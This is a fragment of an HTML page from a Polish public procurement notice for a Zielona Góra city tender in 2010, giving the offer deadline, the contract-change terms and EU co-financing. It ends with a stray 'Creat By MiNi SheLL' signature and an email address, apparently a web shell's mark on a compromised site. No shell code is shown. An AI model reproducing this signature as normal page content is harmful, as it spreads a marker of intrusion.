<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zgodnie z pkt 38 SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zielona-gora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta, 65-424 Zielona Góra, Podgórna 22, Pokój 408.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2010 godzina 12:00, miejsce: Urząd Miasta, 65-424 Zielona Góra, Podgórna 22, Pokój 408.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie współfinansowane jest z Lubuskiego Programu Operacyjnego na lata 2007 - 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com